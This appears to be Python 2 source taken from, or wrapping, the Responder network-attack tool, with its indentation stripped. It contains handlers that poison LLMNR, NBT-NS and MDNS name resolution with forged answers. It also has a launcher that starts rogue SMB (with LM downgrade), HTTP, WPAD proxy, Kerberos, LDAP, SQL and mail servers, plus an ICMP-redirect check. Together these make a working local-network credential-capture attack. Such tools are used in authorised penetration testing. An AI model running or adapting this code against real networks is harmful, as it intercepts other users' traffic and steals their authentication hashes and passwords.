def handle(self):
MADDR = "224.0.0.251"
MPORT = 5353
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
# Break out if we don't want to respond to this host
if (not Request_Name) or (utils.RespondToThisHost(
self.client_address[0], Request_Name) is not True):
return None
if responder_settings.Config.AnalyzeMode: # Analyze Mode
if utils.Parse_IPV6_Addr(data):
print utils.text(
'[Analyze mode: MDNS] Request by %-15s for %s, ignoring' %
(utils.color(self.client_address[0],
3), utils.color(Request_Name, 3)))
else: # Poisoning Mode
if utils.Parse_IPV6_Addr(data):
Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS_Ans(AnswerName=Poisoned_Name,
IP=socket.inet_aton(
responder_settings.Config.Bind_To))
Buffer.calculate()
soc.sendto(str(Buffer), (MADDR, MPORT))
print utils.color(
'[*] [MDNS] Poisoned answer sent to %-15s for name %s' %
(self.client_address[0], Request_Name), 2, 1)
def serve_thread_tcp(host, port, handler):
try:
if utils.OsInterfaceIsSupported():
server = ThreadingTCPServer((responder_settings.Config.Bind_To, port), handler)
server.serve_forever()
else:
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print utils.color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_SSL(host, port, handler):
try:
cert = os.path.join(responder_settings.Config.ResponderPATH, responder_settings.Config.SSLCert)
key = os.path.join(responder_settings.Config.ResponderPATH, responder_settings.Config.SSLKey)
if utils.OsInterfaceIsSupported():
server = ThreadingTCPServer((responder_settings.Config.Bind_To, port), handler)
server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
server.serve_forever()
else:
server = ThreadingTCPServer((host, port), handler)
server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
server.serve_forever()
except:
print utils.color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
def handle(self):
data, socket = self.request
Name = utils.Decode_Name(data[13:45])
# Break out if we don't want to respond to this host
if utils.RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x01\x10":
Finger = None
if responder_settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger(
(self.client_address[0], 445))
if responder_settings.Config.AnalyzeMode: # Analyze Mode
LineHeader = "[Analyze mode: NBT-NS]"
print(
utils.color(
"%s Request by %s for %s, ignoring" %
(LineHeader, self.client_address[0], Name), 2, 1))
else: # Poisoning Mode
Buffer = NBT_Ans()
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
LineHeader = "[*] [NBT-NS]"
print(
utils.color(
"%s Poisoned answer sent to %s for name %s (service: %s)"
% (LineHeader, self.client_address[0], Name,
utils.NBT_NS_Role(data[43:46])), 2, 1))
if Finger is not None:
print(
utils.text("[FINGER] OS Version : %s" %
utils.color(Finger[0], 3)))
print(
utils.text("[FINGER] Client Version : %s" %
utils.color(Finger[1], 3)))
def handle(self):
data, soc = self.request
Name = Parse_LLMNR_Name(data)
# Break out if we don't want to respond to this host
if utils.RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x00\x00" and utils.Parse_IPV6_Addr(data):
Finger = None
if responder_settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger(
(self.client_address[0], 445))
if responder_settings.Config.AnalyzeMode:
LineHeader = "[Analyze mode: LLMNR]"
print utils.color(
"%s Request by %s for %s, ignoring" %
(LineHeader, self.client_address[0], Name), 2, 1)
else: # Poisoning Mode
Buffer = LLMNR_Ans(Tid=data[0:2],
QuestionName=Name,
AnswerName=Name)
Buffer.calculate()
soc.sendto(str(Buffer), self.client_address)
LineHeader = "[*] [LLMNR]"
print utils.color(
"%s Poisoned answer sent to %s for name %s" %
(LineHeader, self.client_address[0], Name), 2, 1)
if Finger is not None:
print utils.text("[FINGER] OS Version : %s" %
utils.color(Finger[0], 3))
print utils.text("[FINGER] Client Version : %s" %
utils.color(Finger[1], 3))
def IsICMPRedirectPlausible(IP):
dnsip = []
for line in file('/etc/resolv.conf', 'r'):
ip = line.split()
if len(ip) < 2:
continue
elif ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x != "127.0.0.1" and utils.IsOnTheSameSubnet(x, IP) is False:
print(
utils.color(
"[Analyze mode: ICMP] You can ICMP Redirect on this network.",
5))
print(
utils.color(
"[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)."
% (IP, x), 5))
print(
utils.color(
"[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.",
5))
def configure(self, interface=None):
assert interface is not None
responder_configs = {}
responder_configs['interface'] = interface
responder_configs['responder'] = {}
responder_configs['responder']['lm_downgrade'] = True
responder_configs['responder']['wpad'] = True
responder_configs['responder']['w_redirect'] = True
responder_configs['responder']['nbtns_domain'] = False
responder_configs['responder']['basic_auth'] = False
responder_configs['responder']['fingerprint'] = False
responder_configs['responder']['ourip'] = None
responder_configs['responder']['force_wpad_auth'] = False
responder_configs['responder']['upstream_proxy'] = None
responder_configs['responder']['analyze'] = False
responder_configs['responder']['verbose'] = False
if not os.geteuid() == 0:
print utils.color("[!] Responder must be run as root.")
sys.exit(-1)
elif responder_configs['responder']['ourip'] is None and utils.IsOsX() is True:
print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
parser.print_help()
exit(-1)
responder_settings.init()
responder_settings.Config.populate(responder_configs)
utils.StartupMessage()
responder_settings.Config.ExpandIPRanges()
if responder_settings.Config.AnalyzeMode:
print utils.color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
def serve_MDNS_poisoner(host, port, handler):
try:
server = ThreadingUDPMDNSServer((host, port), handler)
server.serve_forever()
except:
print utils.color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_udp_broadcast(host, port, handler):
try:
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
except:
print utils.color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def run_responder():
try:
threads = []
# Load (M)DNS, NBNS and LLMNR Poisoners
from core.poisoners.LLMNR import LLMNR
from core.poisoners.NBTNS import NBTNS
from core.poisoners.MDNS import MDNS
threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,)))
threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,)))
# Load Browser Listener
from core.servers.Browser import Browser
threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
if responder_settings.Config.HTTP_On_Off:
from core.servers.HTTP import HTTP
threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
if responder_settings.Config.SSL_On_Off:
from core.servers.HTTP import HTTPS
threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,)))
if responder_settings.Config.WPAD_On_Off:
from core.servers.HTTP_Proxy import HTTP_Proxy
threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
if responder_settings.Config.SMB_On_Off:
if responder_settings.Config.LM_On_Off:
from core.servers.SMB import SMB1LM
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
else:
from core.servers.SMB import SMB1
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
if responder_settings.Config.Krb_On_Off:
from core.servers.Kerberos import KerbTCP, KerbUDP
threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
if responder_settings.Config.SQL_On_Off:
from core.servers.MSSQL import MSSQL
threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
if responder_settings.Config.FTP_On_Off:
from core.servers.FTP import FTP
threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
if responder_settings.Config.POP_On_Off:
from core.servers.POP3 import POP3
threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
if responder_settings.Config.LDAP_On_Off:
from core.servers.LDAP import LDAP
threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
if responder_settings.Config.SMTP_On_Off:
from core.servers.SMTP import ESMTP
threads.append(Thread(target=serve_thread_tcp, args=('', 25, ESMTP,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
if responder_settings.Config.IMAP_On_Off:
from core.servers.IMAP import IMAP
threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
if responder_settings.Config.DNS_On_Off:
from core.servers.DNS import DNS, DNSTCP
threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
for thread in threads:
thread.setDaemon(True)
thread.start()
print utils.color('[+]', 2, 1) + " Listening for events..."
while True:
time.sleep(1)
except KeyboardInterrupt:
sys.exit("\r%s Exiting..." % utils.color('[+]', 2, 1))
